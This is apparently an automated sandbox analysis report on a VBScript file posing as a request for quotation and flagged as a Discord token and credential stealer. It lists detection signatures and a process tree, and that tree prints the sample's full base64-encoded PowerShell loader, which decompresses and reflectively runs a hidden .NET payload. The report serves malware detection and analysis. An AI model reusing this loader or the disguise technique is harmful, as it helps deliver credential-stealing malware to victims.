Edit tour
Windows
Analysis Report
RFQ_43200046412000086500125.vbs
Overview
General Information
Detection
Discord Token Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Discord Token Stealer
AI detected suspicious sample
Creates processes via WMI
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7568 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\RFQ_4 3200046412 0000865001 25.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7608 cmdline:
cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\Des ktop\RFQ_4 3200046412 0000865001 25.vbs.exe " /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7616 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RFQ_43200046412000086500125.vbs.exe (PID: 7728 cmdline:
"C:\Users\ user\Deskt op\RFQ_432 0004641200 0086500125 .vbs.exe" -enc JABBA G4AbwB2AHA AdABzAHMAa QBqACAAPQA gAFsAUwB5A HMAdABlAG0 ALgBEAGkAY QBnAG4AbwB zAHQAaQBjA HMALgBQAHI AbwBjAGUAc wBzAF0AOgA 6AEcAZQB0A EMAdQByAHI AZQBuAHQAU AByAG8AYwB lAHMAcwAoA CkALgBNAGE AaQBuAE0Ab wBkAHUAbAB lAC4ARgBpA GwAZQBOAGE AbQBlAC4AU gBlAHAAbAB hAGMAZQAoA CcALgBlAHg AZQAnACwAJ wAnACkAOwA kAFAAYgBzA HEAcAAgAD0 AIABnAGUAd AAtAGMAbwB uAHQAZQBuA HQAIAAkAEE AbgBvAHYAc AB0AHMAcwB pAGoAIAB8A CAAUwBlAGw AZQBjAHQAL QBPAGIAagB lAGMAdAAgA C0ATABhAHM AdAAgADEAO wAgACQAUQB 5AHkAaQB0A HQAdwBmAGI AdgAgAD0AI ABbAFMAeQB zAHQAZQBtA C4AQwBvAG4 AdgBlAHIAd ABdADoAOgB GAHIAbwBtA EIAYQBzAGU ANgA0AFMAd AByAGkAbgB nACgAJABQA GIAcwBxAHA ALgBSAGUAc ABsAGEAYwB lACgAJwBSA EUATQAgACc ALAAgACcAJ wApAC4AUgB lAHAAbABhA GMAZQAoACc AQAAnACwAI AAnAEEAJwA pACkAOwAkA EYAeABnAGo AYQB0AGIAe QBjAGIAIAA 9ACAATgBlA HcALQBPAGI AagBlAGMAd AAgAFMAeQB zAHQAZQBtA C4ASQBPAC4 ATQBlAG0Ab wByAHkAUwB 0AHIAZQBhA G0AKAAgACw AIAAkAFEAe QB5AGkAdAB 0AHcAZgBiA HYAIAApADs AJABSAGIAb QB3AGUAIAA 9ACAATgBlA HcALQBPAGI AagBlAGMAd AAgAFMAeQB zAHQAZQBtA C4ASQBPAC4 ATQBlAG0Ab wByAHkAUwB 0AHIAZQBhA G0AOwAkAFo AawBuAGoAb wBrAHEAZQA gAD0AIABOA GUAdwAtAE8 AYgBqAGUAY wB0ACAAUwB 5AHMAdABlA G0ALgBJAE8 ALgBDAG8Ab QBwAHIAZQB zAHMAaQBvA G4ALgBHAHo AaQBwAFMAd AByAGUAYQB tACAAJABGA HgAZwBqAGE AdABiAHkAY wBiACwAIAA oAFsASQBPA C4AQwBvAG0 AcAByAGUAc wBzAGkAbwB uAC4AQwBvA G0AcAByAGU AcwBzAGkAb wBuAE0AbwB kAGUAXQA6A DoARABlAGM AbwBtAHAAc gBlAHMAcwA pADsAJABaA GsAbgBqAG8 AawBxAGUAL gBDAG8AcAB 5AFQAbwAoA CAAJABSAGI AbQB3AGUAI AApADsAJAB aAGsAbgBqA G8AawBxAGU ALgBDAGwAb wBzAGUAKAA pADsAJABGA HgAZwBqAGE AdABiAHkAY wBiAC4AQwB sAG8AcwBlA CgAKQA7AFs AYgB5AHQAZ QBbAF0AXQA gACQAUQB5A HkAaQB0AHQ AdwBmAGIAd gAgAD0AIAA kAFIAYgBtA HcAZQAuAFQ AbwBBAHIAc gBhAHkAKAA pADsAWwBBA HIAcgBhAHk AXQA6ADoAU gBlAHYAZQB yAHMAZQAoA CQAUQB5AHk AaQB0AHQAd wBmAGIAdgA pADsAIAAkA EoAegBrAGw AcgBvAHMAI AA9ACAAWwB TAHkAcwB0A GUAbQAuAEE AcABwAEQAb wBtAGEAaQB uAF0AOgA6A EMAdQByAHI AZQBuAHQAR ABvAG0AYQB pAG4ALgBMA G8AYQBkACg AJABRAHkAe QBpAHQAdAB 3AGYAYgB2A CkAOwAgACQ AUQBtAHIAZ wBjAGQAZQB qACAAPQAgA CQASgB6AGs AbAByAG8Ac wAuAEUAbgB 0AHIAeQBQA G8AaQBuAHQ AOwAgAFsAU wB5AHMAdAB lAG0ALgBEA GUAbABlAGc AYQB0AGUAX QA6ADoAQwB yAGUAYQB0A GUARABlAGw AZQBnAGEAd ABlACgAWwB BAGMAdABpA G8AbgBdACw AIAAkAFEAb QByAGcAYwB kAGUAagAuA EQAZQBjAGw AYQByAGkAb gBnAFQAeQB wAGUALAAgA CQAUQBtAHI AZwBjAGQAZ QBqAC4ATgB hAG0AZQApA C4ARAB5AG4 AYQBtAGkAY wBJAG4AdgB vAGsAZQAoA CkAIAB8ACA ATwB1AHQAL QBOAHUAbAB sAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - InstallUtil.exe (PID: 8184 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 9 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 3 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |